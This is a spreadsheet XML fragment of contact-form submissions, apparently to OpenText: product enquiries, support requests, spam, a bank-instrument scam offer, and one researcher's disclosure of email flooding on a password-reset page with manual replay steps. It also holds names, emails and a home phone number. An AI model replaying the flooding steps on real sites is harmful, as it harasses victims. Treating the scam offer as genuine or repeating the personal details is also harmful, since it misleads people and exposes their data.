Vielen Dank im Voraus!</t>
  </si>
  <si>
    <t>can't download success story from website _x000D_
for example : _x000D_
http://www.opentext.com/connect/global/sso_download_open?docpath=/corporate/customer/casestudy/Salt_River_Project-0916.pdf_x000D_
_x000D_
i see the error _x000D_
[Inline script in 'sso_download_open' (27594) on page 'global/sso_download_open'] Line 0: uncaught exception: [object Exception]</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We had to move our virtual alchemy server due to a server failure, Alchemy now wont activate its licence._x000D_
_x000D_
Can you contact me asap?_x000D_
_x000D_
Thansks,_x000D_
Fintan</t>
  </si>
  <si>
    <t>We have a team of 7 Technical writers who need access to a DMS at all times. At a given time, we will have upto 20 client users needing access to the DMS to edit/view documents. However, these client users won't be fixed so their licences need to be recycled to allow other clients access to the system. Given the above requirements, can you give me a quote for the Content Suite Platform?</t>
  </si>
  <si>
    <t>Hello,_x000D_
	 	 	_x000D_
A lots of ecommerce companies sale depends upon the organic traffic which comes to the site._x000D_
If you are wondering how can we bring new customers to your website, let's have a free consultation session._x000D_
_x000D_
_x000D_
Elsner is a global digital studio located at the heart of India with local partners in London/Australia/USA.With specialization in the field of SEO we make sure that our customers are getting organic traffic from the search engines._x000D_
_x000D_
Starting from keyword research,competitor analysis and On-page and Off-page activities ,our customers have truly benefitted by partnering with us for their marketing activities.A letter of appreciation from our client :_x000D_
_x000D_
Reply us @ nilesh@elsner.com to talk further with our consultants!!!_x000D_
_x000D_
Don't want to receive any updates ? Click to http://elsnertechnologies.com/u4/unsubscribe/reception@citiscan.com.au</t>
  </si>
  <si>
    <t>Dear Mr/Mrs,_x000D_
I need to get press about Document Management System. please quote your rate Price. And please give me your datasheet._x000D_
i can provide your product if my User as request budget._x000D_
_x000D_
Thank u</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrtes Opentext Team,_x000D_
_x000D_
wir evaluieren derzeit mehrere EDI Lösungen und haben eine Frage zu Ihrer EDI Lösung. Unterstützen sie die Protokolle OFTP, OFTP2, AS2, X.400, SFTP, FTPS und einen Webservice ?_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
David Konzack _x000D_
_x000D_
TecAlliance GmbH _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
wir haben 10 Lizenzen Opentext Exceed Version 14 im Einsatz und möchten ggf. auf die aktuelle Version updaten._x000D_
Laut Aussage unseres Händlers gibt es keine Updates zu kaufen. Ist diese Aussage so richtig? _x000D_
Mit freundlichen Grüßen_x000D_
Marco Castens </t>
  </si>
  <si>
    <t>Seek quote for Teleform software support and maintenance for dept's current instance of Teleform</t>
  </si>
  <si>
    <t>May I please have a login to the Knowledge Center?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested in acquiring the contact list of Digital Dealer?_x000D_
_x000D_
We provide you contact list of : CEO's, CIO's,CTO's and IT Titles, VP's, Directors, Managers, Project Leads, Presidents, Owner, General Manager, General sales Manager, social Media Manager, Internet Manager, Marketing Director, E- Commerce Director, CRM Managers, BDC Manager, Fixed Operations Manager, F &amp; I Managers, OEM Representatives, Automotive dealers, Agent / Buyer / Purchasing, Consultant, Service Providers, Developers, Resellers, Corporate Managers / Cooperate Management Dept., Sales Dept., Marketing Dept., System Integrators (SI), and other key decision maker._x000D_
_x000D_
Kindly mention below the details to understand your needs better:_x000D_
_x000D_
Target Industry :_x000D_
Target Job Title :_x000D_
Target Geography :_x000D_
_x000D_
Best Regards,_x000D_
Kiyara James_x000D_
</t>
  </si>
  <si>
    <t>I would like to obtain Information on Captiva, including licensing costs</t>
  </si>
  <si>
    <t>Call for Alliance complementing your HR software for ISO 22316:2017's Market opened by OECD_x000D_
_x000D_
Hi there,_x000D_
_x000D_
You are publisher, distributor, consultant or user of HR performance management applications._x000D_
_x000D_
To go beyond the performance Appraisal relationship between an employee and his supervisor, the OECD now incorporates, since July 2017, the requirement of ISO 22316: 2017 to supplement the existing IT of HRM in order to take into account the financial and budgetary management constraints (Management of operational performance focused on the accounting result determined by the risk appetite threshold) of the Basel III-derived legislation, the NAIC (US Solvency) and EU Solvency II ORSA rules widely recognized as the International Best Practice that affect the financing and insurance of companies of all sectors as well as Local Authorities and Public Services at large:_x000D_
_x000D_
The OECD is 35 member countries, including the United States, Canada and the European Union. The Organization also shares its expertise with employers' federations and exchanges with more than 100 other countries and economies, from Brazil, China and India to the least developed countries of Africa._x000D_
_x000D_
We have anticipated HR-driven operational performance management requirements, patented the management accounting interaction methodology required (Cost Accounting or Business Accounting) and built the SaaS application that complements the existing IT, processes and provides the missing data:_x000D_
See the articles on IT-IRM of the EU-US Task Force on ERM (Experts and Academics from 3 European universities and 2 US universities) published in the United States in 2013, 2014 and 2016 for ISACA Journal's network of 180 countries._x000D_
_x000D_
In 2017-2018, in view of the Liquidity Coverage Ratio (LCR) which will be 100% on January 1, 2019, the urgency for the adaptation of customers of banks and financial institutions to this process underway since the last financial crisis, is on the one hand that all entities (SMEs an</t>
  </si>
  <si>
    <t>Credit card payment not processed.  Credit card information is being sent to accounts.receivable@opentext.com.  We are unable to open on the payment link listed on the invoice.</t>
  </si>
  <si>
    <t xml:space="preserve">Not sure you want people that work for you to be spreading this kind of statement on their LinkedIn accounts. LinkedIn is for professional content and is not Facebook. Statements like this will turn people away from your company. You might want to look at your employee Rodger Ghai's LinkedIn page (and picture accompanying)._x000D_
_x000D_
_x000D_
Roger Ghai_x000D_
Roger Ghai Tier 3 ATT support 1d_x000D_
_x000D_
"I wish all companies did not hire liberals"_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a preliminary quote for OpenText Salesforce ECM for a potential client. We are in the early state of pre-sales so I don't have a lot of business requirements or # user information. Looking to get a high-level quote for OpenText ECM. Thanks. </t>
  </si>
  <si>
    <t>Support escalation. _x000D_
_x000D_
Service Request# 1-3005228888_x000D_
_x000D_
My engineer was working with the support team on this request. They asked for additional information, which we provided a week ago, and we have heard nothing back since, despite follow up asking for updates on several occasions.</t>
  </si>
  <si>
    <t xml:space="preserve">Arthrex, Inc. will be implementing a new document management system, replacing an existing product. Arthrex is requesting a product demonstration of system capabilities of Documentum. More information will be provided upon request. </t>
  </si>
  <si>
    <t>Hello, We recently purchased a desktop license for Teleform (PO was issues 7/7/2017. "PO P00250975"). We have since not received the license key for the software, or any email replies from the sales person Sarah Schexnayder. I've been in contact with Lanny Sparks who asked me to submit a ticket. Can I please have the license key, or an update on where we're at? Thanks</t>
  </si>
  <si>
    <t>I am interested in discussing licensing.</t>
  </si>
  <si>
    <t>Legal contract management solution</t>
  </si>
  <si>
    <t>I would like a demo...</t>
  </si>
  <si>
    <t>http://www.opentext.com/training/coursedetails.html?id=2237_x000D_
_x000D_
can you tell me ,, if this is the actual exam or a refresher course for the exam? what is the availability, is this something that is held often?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
I'd like some more information about OpenText Capture Centre if possible. I have been comparing it against other products and should like to ask the following questions:_x000D_
_x000D_
•	Do you have a support forum for your product?_x000D_
•	Does your software allow for corrections by users?_x000D_
•	Can it transfer processed files to cloud storage?_x000D_
•	Can arbitrary metadata be added as part of the processing?_x000D_
•	What are the platform requirements of the software?_x000D_
•	Does your software also capture email attachments?_x000D_
</t>
  </si>
  <si>
    <t>My company is looking to implement a document management system. How can you help us?</t>
  </si>
  <si>
    <t>OpenText Suite for SAP.  I have a business requirement to be able to scan Vendor invoices and attach/link these to the SAP Invoice/billing document. I know we already have a license for SAP Archiving by Open Text, but not sure if this License would cover the Document Access part of the OpenText Suite for SAP. If not I need somesort of high level costing and system/hardware requirements</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
I am looking to get a demonstration of the capabilities of the OpenText DAM and its functionality._x000D_
_x000D_
I am currently reviewing our DAM capabilities due to a digital transformation project detailing a list of asset requirements our current solution may not be capable of supporting._x000D_
_x000D_
We will require the DAM solution to be capable of integrating with our existing PIM system (STEP from StiboSystems) and our new digital platform (Sitecore)._x000D_
_x000D_
I would be looking to get a demonstration lined up within the next 2 weeks._x000D_
_x000D_
If you require any further clarification then please do drop me a line to discuss._x000D_
_x000D_
Kind regards_x000D_
Simon</t>
  </si>
  <si>
    <t xml:space="preserve">I am a law student from School Of Law,Christ University, Bangalore and am very keen on knowing about the working of your software in analyzing legal documents. </t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir sind aktuell auf der Suche nach einer erfahrenen Digital-Agentur, die uns bei unserem geplanten Website-Relaunch unterstützt._x000D_
Wir möchten unsere aktuelle Website www.etas.com in puncto Design, Navigation und Inhalt weiterentwickeln. Oberstes Ziel ist dabei die Erhöhung der Nutzerfreundlichkeit für unsere Zielgruppen: potenzielle und aktuelle Anwender unserer Tools, Toolkoordinatoren, Management, Einkauf in OEM, Tier-1, vornehmlich Automotive, mittelfristig auch andere Industrien, wie Automation, Off Highway, Landwirtschaft und Konsumenten; darüber hinaus auch Stellensuchende, Fachjournalisten, Hochschulen und Partner. Die Umsetzung soll auf dem aktuellen CMS „Opentext“ (ehem. RedDot) umgesetzt werden._x000D_
_x000D_
Können Sie mir eine Liste von Agenturen / Unternehmen im Raum Stuttgart, gerne aber auch deutschlandweit, zukommen lassen auf denen diverse Dienstleister gelistet sind?_x000D_
_x000D_
Vielen Dank vorab für Ihre Rückmeldung._x000D_
_x000D_
Beste Grüße,_x000D_
Lisa_x000D_
Scheftschik_x000D_
</t>
  </si>
  <si>
    <t>Kindly provide me access to opentext connect</t>
  </si>
  <si>
    <t xml:space="preserve">Requirement to Implement CMS </t>
  </si>
  <si>
    <t xml:space="preserve">Access to MySupport please.._x000D_
Jim van Weelderen jim@ikm.nl is our contact person at OT.. _x000D_
Can you please grant me access to the support area, basically so I can retrieve the "SAPK-304COINOTEXERP" package, so I can extract the Release information, so I can extract the Vendor Key for the KEEP strategy while upgrading SAP ERP EHP7 to EHP8 please._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Respected Opentext Security Team,_x000D_
_x000D_
Hi!_x000D_
I'm Suyog Palav, Security Researcher from India._x000D_
_x000D_
I found Vulnerability on your website. The details of the Vulnerability are as follows._x000D_
_x000D_
Vulnerability Title : Email Flooding Attack on Opentext Forgot Password_x000D_
_x000D_
Vulnerable Domain : https://login.opentext.com/connect/sso_controller-main?sys_action=recoverpasswordform_x000D_
_x000D_
Severity : HIGH_x000D_
_x000D_
Description :_x000D_
_x000D_
   - Brute-force attack forwards lots of Password Reset Request to Victim Email Address._x000D_
   - This Page doesn't have any protection against Brute-force attack._x000D_
    - No Rate Limitation_x000D_
_x000D_
_x000D_
Impact :_x000D_
_x000D_
   - Using this Email flooding attack, Attacker can send multiple (Millions/billions) request to the Victim Email Address._x000D_
   - Brute-force attack is exists on this page._x000D_
_x000D_
_x000D_
Recommendation :        _x000D_
_x000D_
   - It's recommended to implement some type of lockout after a defined number of email's attempts._x000D_
   - Use CAPTCHA or Security Code is best mechanism for these type of attack._x000D_
   - Adding a Rate Limiting Feature._x000D_
_x000D_
_x000D_
Proof of Concept :_x000D_
 _x000D_
   1. Go to Opentext Forgot Password Page :- https://login.opentext.com/connect/sso_controller-main?sys_action=recoverpasswordform_x000D_
   2. Enter Victim Email Address._x000D_
   3. and Click on "Send" button._x000D_
   4. Capture this Request._x000D_
   5. Without any modification send this request multiple times.  (using Null Payload)_x000D_
_x000D_
          - So, now we are going to perform Multiple Reset Password Request on Victim Email Address._x000D_
                                            &amp;_x000D_
            lets see is Opentext able to block our request or not...._x000D_
_x000D_
   6. Start  Attack.  _x000D_
   7. Response : now you can see the response _x000D_
_x000D_
                   RESPONSE : 200  i.e. Password Reset Request Sent Successfully._x000D_
   _x000D_
_x000D_
   8. Lets, Check Victim Email Account._x000D_
_x000D_
            - You can see that there are so many Emails........._x000D_
_x000D_
           - Opentext Brute Force mechanism is still failed to block our request_x000D_
             &amp; Attack is still ON_x000D_
_x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Hi,_x000D_
 We have used iHub Trial Edition and feel this have lots of good functionalities and web interface_x000D_
 We are looking a BI application which have rich capabilities of visualisation, graphs/charting, drill-down reporting and OLAP_x000D_
 _x000D_
Now before finalising iHub, we have couple of question is our mind:_x000D_
 _x000D_
1. iHub is a cloud based application? In fact we have lots of Personal Information of our client and cannot share with any other platform._x000D_
    So we want a BI application that have in our house hosting _x000D_
 _x000D_
2. Does iHub has web integration. I mean if we creates graphs/chars in iHub for client and that can we shared/visible to client web page?_x000D_
   If yes please share some help urls _x000D_
 _x000D_
3. We want to know the licensing cost for the enterprises iHub._x000D_
 _x000D_
Hope I clearly describe our requirement, if you need any other information, please revert._x000D_
 _x000D_
Thanks_x000D_
Avinash</t>
  </si>
  <si>
    <t>To meet new friend N it will B great for each other amen</t>
  </si>
  <si>
    <t>Probleme mit unserem SAP Archiv System(Archiv Services for SAP V 6.5 SP2 / Documentum);_x000D_
Sehr geehrte Damen und Herren,_x000D_
hierzu hatte wir als EMC Kunde bereits ein Ticket über deren Service Hotline eröffnen lassen "Technical Support Service Request  88104910", leider hat sich bisher niemand mehr auf unsere Emails gemeldet (Ellinor Rheinfurth). Es wäre für uns sehr hilfreich, wenn wir aus Ihrem Hause einen technisch/vertrieblichen Ansprechpartner wegen unseres Anliegens genannt bekämen. Danke und Grüße_x000D_
Sacha Straub</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team Supports,_x000D_
My customer Thai Malaya Glass Compan, would like installation manual. Download and launch the program._x000D_
_x000D_
Thank you_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">If the domain "www.firstclass.com" is not used at your site,_x000D_
can I purchase it?_x000D_
</t>
  </si>
  <si>
    <t>◇◆◇◆◇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
『即戦力・高スキル』×『パート派遣』の3つのメリット_x000D_
──────────────────────────────────────────────_x000D_
☆フルタイムではいない人材が、パートタイムにならまだいます！_x000D_
☆必要な時間、必要な日数だけの活用なので、コストが抑えられます！_x000D_
☆１人分の業務をワークシェアで稼動させれば、お休みや退職時のリスクを軽減できます。_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━◇◆◇◆◇_x000D_
_x000D_
突然のメール失礼致します。_x000D_
このたびは貴社のホームページを拝見してご連絡させて頂きました。_x000D_
株式会社キャリアシステムと申します。_x000D_
_x000D_
弊社は、東京・名古屋・大阪で高いスキルを持つ主婦層の人材活用を専門として、パートタイム型／ワークシェア型派遣に特化した人材派遣会社です。_x000D_
_x000D_
企業様が抱える、慢性的な人材不足対策や即戦力採用に対しての課題解決のため、求められるポジションや経験に見合った人材をご紹介しております。_x000D_
_x000D_
その中でも、弊社が特化し強みとしているのが下記の職種となります。_x000D_
◆Web人材（デザイナー、ディレクター、コーダー、HP更新、DTP等）_x000D_
◆ITエンジニア（SE・PG、テスト工程、アシスタント等）_x000D_
◆事務系職種（営業事務、経理事務、総務事務、受付事務、医療事務等）_x000D_
◆サポート系職種（カスタマサービス、テレマ、CAD事務、営業アシスタント等）_x000D_
_x000D_
本日は、今すぐ働ける人材として、下記に「HOT人材情報」を提案いたします。_x000D_
興味ある人材でしたら、是非一度ご連絡下さい。_x000D_
_x000D_
今日のHOT人材-----------------------------------------------_x000D_
【イニシャル】H・Kさん_x000D_
【ポイント】約15年の経理経験を持つスペシャリスト人材_x000D_
（会計ソフト： MJS、TKC、勘定奉行、弥生）_x000D_
【経験値】比較的小規模な企業において年次決算（補助）含めた、_x000D_
経理全般の業務に取り組んだ経験あり、日商簿記検定 2 級_x000D_
【就業形態】週4日、10時～16時_x000D_
【月額例】184,000円（2,300円／時×5時間×月16日での勤務時）_x000D_
※通勤交通費は別で御請求いたします_x000D_
-------------------------------------------------------------------------_x000D_
_x000D_
今日のHOT人材-----------------------------------------------_x000D_
【イニシャル】K・Cさん_x000D_
【ポイント】弥生会計、PCA、勘定奉行、スーパーストリーム、オラクル、JLDなど_x000D_
会計ソフトは何でも使える経理スペシャリスト_x000D_
【経験値】財務表（BS・PL表）作成や月次・半期/年次決算（単体・連結資料作成補助）などの財務経理から_x000D_
社内法務（契約書管理、取締役会・株主総会運営アシスタント）など人事総務まで_x000D_
10年以上の経験あり_x000D_
【就業形態】週3日、10時～16時_x000D_
【月額例】144,000円（2,400円／時×5時間×月12日での勤務時）_x000D_
※通勤交通費は別で御請求いたします_x000D_
-------------------------------------------------------------------------_x000D_
_x000D_
上記以外にも毎日パート人材が登録にお越しいただいてます。_x000D_
経験職種や取得されている資格などは多岐にわたります。_x000D_
_x000D_
実際にパートタイム派遣をご活用頂いている_x000D_
企業様をご紹介しております。是非、こちらもご覧下さい！_x000D_
https://www.parthaken.jp/employer/_x000D_
_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
株式会社キャリアシステム 　東京支店_x000D_
担当：浅井、佐藤_x000D_
cs-contact@919.jp_x000D_
_x000D_
〒107-0052 東京都港区赤坂2-11-7 ATT新館_x000D_
TEL：03-5574-7333_x000D_
フリーコール：0120-505-169_x000D_
_x000D_
「派遣deパート」：https://www.parthaken.jp/_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
How are you? Hope you are fine._x000D_
_x000D_
I have been checking your website quite often. It has seen that the main keywords are still not in top 10 rank. You know things of working; I mean the procedure of working has changed a lot._x000D_
_x000D_
So I would like to have opportunity to work for you and this time we will bring the keywords to the top 10 spot with guaranteed period._x000D_
_x000D_
There is no wondering that it is possible now cause, I have found out that there are few things need to be done for better performances (Some we Discuss ,in this email). Let me tell you some of them -_x000D_
_x000D_
1. Title Tag Optimization_x000D_
2. Meta Tag Optimization (Description, keyword and etc)_x000D_
3. Heading Tags Optimization_x000D_
4. Targeted keywords are not placed into tags_x000D_
5. Alt / Image tags Optimization_x000D_
6. Google Publisher is missing_x000D_
7. Custom 404 Page is missing_x000D_
8. The Products are not following Structured markup data_x000D_
9. Word-Press is not installed properly, in the blogs_x000D_
10. Website Speed Development (Both Mobile and Desktop )_x000D_
Please check via Google Developer -_x000D_
https://developers.google.com/speed/pagespeed/_x000D_
11. Favicon needs to be changed too._x000D_
12.Off –Page SEO work_x000D_
_x000D_
Lots are pending…………….._x000D_
_x000D_
You can see these are the things that need to be done properly to make the keywords others to get into the top 10 spot in Google Search &amp; your sales Increase._x000D_
_x000D_
Also there is one more thing to mention that you did thousands of links that time for your website, which are considered as spam after Google roll outs several updates of Panda and penguin. We need to remove them too._x000D_
_x000D_
Sir, please give us a chance to fix these errors and we will give you rank on these keywords._x000D_
_x000D_
Please let me know if you encounter any problems or if there is anything you need. If this email has reached you by mistake or if you do not wish to take advantage of this free advertising opportunity, please accept my apology for any inconvenience caused and rest assured that you will not be contacted again._x000D_
_x000D_
Many thanks for your</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
We Offer Bank/Financial Instruments Such As Bank Guarantees (BG), Standby Letter Of Credit (SBLC), Documentary Letter Of Credit (DLC), Letter Of Credit (LC), Performance Bonds (PB), Medium Term Notes (MTN), Which Are Specifically For Lease/Purchase But Not Direct Funding. Our Bank Instrument Can Be Engage Into PPP Trading, Outright Discount, Signature Project(S) Such As Aviation, Agriculture, Petroleum, Telecommunication, Construction Of Dams, Bridges, Real Estate And All Kind Of Projects. It Can Also Serve As Collateral With Any Bank In The World To Secure Loan For Your Project Or To Activate Credit Line To Finance Your Business As Well As Any Project That Need Financing. You Can Also Use Our Bank Instrument To Purchase Goods And Service From Any Manufacturer Irrespective Of Their Location._x000D_
_x000D_
We Will Be Glad To Share Our Working Procedures With You Upon Request To Help Us Proceed Towards Closing Deals Effectively._x000D_
_x000D_
Intermediaries/Consultants/Brokers Are Welcome To Bring Their Clients And Are 100% Protected And Open To Their Commission. In Complete Confidence, We Will Work Together For The Benefits Of All Parties Involved._x000D_
_x000D_
B.Regards,_x000D_
Roberto Montoya</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
_x000D_
This email is to inform you that Regis Aged Care will be going to tender for a Documentation Solution to support our policies and procedures and we would like for OpenText to participate in a closed market tender. _x000D_
_x000D_
If you are interested in participating, could you contact me via phough@regis.com.au and I will send through the appropriate information._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Prue Hough</t>
  </si>
  <si>
    <t>Looking for standalone Library Management solution.</t>
  </si>
  <si>
    <t>We are in the process to identify the best approach for digital transformation keeping in mind that we select SAP as ERP and ISU as a beginning and we looking to start from huge amount of memos and correspondence and to be integrated with our systems SAP later on.</t>
  </si>
  <si>
    <t>Hi There,_x000D_
Appreciate letting me know the Agenda for _x000D_
5-0161 OpenText Consultant Certification Bootcamp _x000D_
or the covered topics during this boot camp._x000D_
Thanks_x000D_
_x000D_
BR,_x000D_
Mohanad Mokhtar</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Currently we don't use EDI but are starting to work with Nordstrom and would like to get some information about setting up an EDI catalog and perhaps some other services related to EDI that may be needed. We use Shipwire as our fulfillment partner and they have EDI capabilities. _x000D_
_x000D_
Best,_x000D_
_x000D_
Edgard</t>
  </si>
  <si>
    <t>注册送8-88免费财金 加v信: lll19890907  q号: 211335695 领取www.jin40.com</t>
  </si>
  <si>
    <t>Hello there!_x000D_
_x000D_
My name is Mannie Young and I am an organizer of Django Girls in Koforidua, Ghana. Django Girls is a global, non-profit organization that helps women get involved with technology and teaches them about programming._x000D_
 _x000D_
We're doing our first ever workshop in Koforidua on 10th and 11th November 2017 and we would love to have you involved. We're looking for sponsors who can help us in anyway possible make the event a success, and a fun and exciting experience for our lucky participants who would been have their first experience with coding._x000D_
_x000D_
We would love to inquire if your prestigious organization Fast Enterprises would love to get involved and help spread the awareness of the beauty of programming especially Django! You would be recognised as a part sponsor of the event on our website, social media outlets and other forums._x000D_
_x000D_
If you're interested in being part of our journey, we would love to send our formal proposal for your review and consideration._x000D_
_x000D_
Can't wait to hear from you!_x000D_
_x000D_
Warm regards,_x000D_
Mannie_x000D_
Co-organiser of Django Girls Koforidua._x000D_
www.djangogirls.org/koforidua</t>
  </si>
  <si>
    <t>I need access to all Support , Knowledge base , open tickets etc</t>
  </si>
  <si>
    <t>How can I get the trash can icon back on the desktop?</t>
  </si>
  <si>
    <t>Starting a project to evaluate, select and implement a document/correspondence automation solution this year.</t>
  </si>
  <si>
    <t>Looking for an answering system for current phone system in our office. Previuosly your offered to us, Do you still have it?</t>
  </si>
  <si>
    <t xml:space="preserve">CTC currently has Rightfax Express.  It is becoming unreliable, and when it does stop working, it severely disrupts or business, as well as consumes IT resources that should be working on other projects.  Would like to explore a Managed Service cloud solution for faxing.  </t>
  </si>
  <si>
    <t>We are looking for desktop virtualization software to replace VNC. We see various performance problems with Virtuoso layout graphics zoom/redraw.</t>
  </si>
  <si>
    <t>What is the socio-economic status of your company?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
Would you be interested in acquiring our recently updated contact list of “Oil &amp; Gas, Offshore, Onshore and Pipeline Industry Professionals” with email address? If so, please let me know your target audience. I will get back to you with counts and best pricing option._x000D_
_x000D_
Target Industry:  ______?_______; Geography:  _______?_______; Job Title (Any):  ________?_________:_x000D_
_x000D_
Data included: Company Name, Contact Name, First Name, Last Name, Email Address, Title, Website, Address, Address 1, City, State, ZIP Code, Country, Phone Number, FAX Number, Employees size, Revenue ($ Mil), SIC Code and Industry._x000D_
_x000D_
Look forward to hearing from you._x000D_
</t>
  </si>
  <si>
    <t>Guten Tag_x000D_
Die Arcondis AG ist das grösste, exklusiv auf die Life Sciences Industrie spezialisierte Beratungsunternehmen in der Schweiz, Deutschland und Österreich. Wir führen im Auftrag eines Kunden, welcher in der Schweiz im Automotive Bereich tätig ist, eine Evaluation eines Langzeit Archivsystems für elektronische Daten durch. _x000D_
In einer Vorevaluation wurde ihre Produkte „InfoArchive“ und „OpenText Archive" als mögliche Kandidaten identifiziert, welche die Anforderungen unseres Kunden an ein Langzeitarchivierungs-System abdecken können. Nach Rücksprache mit unserem Kunden würden wir nun Ihr Produkte und Ihre Unternehmung besser kennenlernen._x000D_
Bitte teilen Sie uns mit, an wen wir uns mit unserer Anfrage nach einem Request for Quote (RFQ) in Ihrer Unternehmung wenden können. _x000D_
Vielen Dank!_x000D_
Mit freundlichen Grüssen_x000D_
Martin Reinli</t>
  </si>
  <si>
    <t>Do you offer 2-0106 Content Server Information Administration v16 in a virtual classroom or on-line format?  I am also interested in virtual training opportunities for the Workflow classes.  Thank you</t>
  </si>
  <si>
    <t>Interested in pricing and features of eDocs Record Management solution.</t>
  </si>
  <si>
    <t>Essentials from me are:_x000D_
_x000D_
1)	I want to be able to scan-to-email directly from our MFP and perhaps have this sent directly to you / the application for processing._x000D_
2)	I want ultimately to have the documents stored in SP O365 where I will have one record for the invoice / invoice number / totals itself and subrecords for the line items linked to the parent record._x000D_
3)	I want the OCR to recognise the fields automatically, and similarly the repeating rows that are the line items._x000D_
4)	We estimate we will scan 3k to 5k of documents per annum._x000D_
_x000D_
I need information and pricing._x000D_
_x000D_
Thanks,</t>
  </si>
  <si>
    <t xml:space="preserve">Need a copy of my certificate: OT Business Consultant Content Server (was called Livelink at the time in 2009). Please email a soft copy. </t>
  </si>
  <si>
    <t xml:space="preserve">Need pricing information.  please contact me at rajib.hussain@ssa.gov_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour, _x000D_
_x000D_
Nous sommes un Cabinet d'avocats de 2500 personnes.  Nous lançons un appel d'offre pour un projet Extranet, et nous avons identifié vos solutions comme pouvant répondre à notre besoin. _x000D_
_x000D_
Nous souhaiterions pouvoir avoir un contact avec qui s'entretenir sur le sujet. _x000D_
Est-il possible de re-contacter, de préférence par mail,  la personne suivante (qui prendra mon relai pendant mes congés jusqu'à 4 septembre) : Chaehoi Ibrahim, Ibrahim.CHAEHOI@fidal.com -  01.47.38.46.22_x000D_
_x000D_
Merci d'avance, _x000D_
Cordialement, _x000D_
Marion Bonadei </t>
  </si>
  <si>
    <t xml:space="preserve">Please block my home phone number 831-722-2067 I'm receiving a fax from your company and would really appreciate not receiving 12 call in a row at 6 am. Thank you Janine Homem_x000D_
P.S _x000D_
I've tried block it on my end but my service is saying it full. I'll contact AT&amp;T as well. Thanks again for you assistants </t>
  </si>
  <si>
    <t>Dear Entrepreneur,_x000D_
_x000D_
Hope everything is fine at your end!_x000D_
_x000D_
This is Akash, a digital branding expert by profession. I examined your website and came to know that you may be concerned with gaining new customers and losing less business to your competitors._x000D_
_x000D_
Allow me to analyze and figure out the factors that contribute to low Search Engine results and take vital steps to bring more customers and sales._x000D_
_x000D_
My complete Analysis will give you clear insights for:  _x000D_
_x000D_
	Why your website rank is behind of your competitors?_x000D_
	How to get enough Organic Traffic and Sales?_x000D_
	Strategy to get many customers through Social Media._x000D_
	Guaranteed First Page ranking on Search Engines._x000D_
	Getting business through Mobile Optimization._x000D_
  _x000D_
After your confirmation, I would be glad to provide you with further details or Digital Branding Proposal of your website, and then arrange a time to speak with you over the phone or Skype._x000D_
_x000D_
Eagerly awaiting for your quick response._x000D_
_x000D_
------	_x000D_
Thanks &amp; Regards_x000D_
Akash Dash_x000D_
Business Development Manager_x000D_
Email: akashdash.techtsss@gmail.com_x000D_
PKB505/03_x000D_
_x000D_
P.S: - This is our marketing strategy to use a Gmail account. Once you reply us back, we will communicate with you through our corporate Email ID._x000D_
_x000D_
Kindly ignore the mail, if doesn't fit your requirement, this is a bulk mailer. Any inconvenience caused will be highly regretted.</t>
  </si>
  <si>
    <t>Quote for Solution</t>
  </si>
  <si>
    <t>Opentext application support : _x000D_
Opentext spawner not getting strated giving port  not connected error</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
die Stadtwerke Düsseldorf werden demnächst die Client-Computer nach Windows 10 migrieren._x000D_
Da auf Ihrer Internetseite weder die Version noch der Support unter Windows 10 erwähnt wird, haben wir folgende Fragen:_x000D_
Welche Version Gupta SQLBase ist z.Zt. aktuell?_x000D_
Welche Versionen unterstützen Windows 10 Enterprise?_x000D_
Vielen Dank für Ihre Unterstützung._x000D_
Mit freundlichen Grüßen_x000D_
Michael Kutscheid_x000D_
Testcenter_x000D_
Stadtwerke Düsseldorf AG_x000D_
Höherweg 100_x000D_
40233 Düsseldorf_x000D_
testcenter@swd-ag.de</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon, _x000D_
My name is Carmen Garcia and I work at StudyPortals. At the moment, we are looking to optimize our client feedback gathering and processing, specially regarding text analysis. I have been looking into several software solutions to help us do so and OpenText seems like a good software solution to work with. Hence, I was wondering if you could give me a bit more information about it. _x000D_
Specially regarding its CRM integration as we work with Dynamics 365 and would like to integrate several client interaction sources such as emails, phone calls or surveys for example. _x000D_
I would also like to know what package (Content Suite or a combination) would be best for our focus and the pricing of the software. _x000D_
Looking forward to hearing from you. _x000D_
Best regards, _x000D_
</t>
  </si>
  <si>
    <t>Is it possible to be able to browse edocs to upload documents from eDocs to our online portal?  For example i am on my client portal and i click browse to upload files i can see my desktop but it would be great if i could search eDocs to upload a file from eDocs._x000D_
Thanks_x000D_
Michelle</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for PDF compare software, we came across Brava, would like to know more in detail on capabilities of brava </t>
  </si>
  <si>
    <t>Hi_x000D_
 _x000D_
I'm a project manager from Carlsberg, and I've been asked to provide our group commercial department with some figures for a new DAM solution, hosted in the cloud._x000D_
 _x000D_
Our challenge is:_x000D_
Carlsberg's Group Commercial is trying to quickly find an alternative solution to our legacy DAM on-premise solution._x000D_
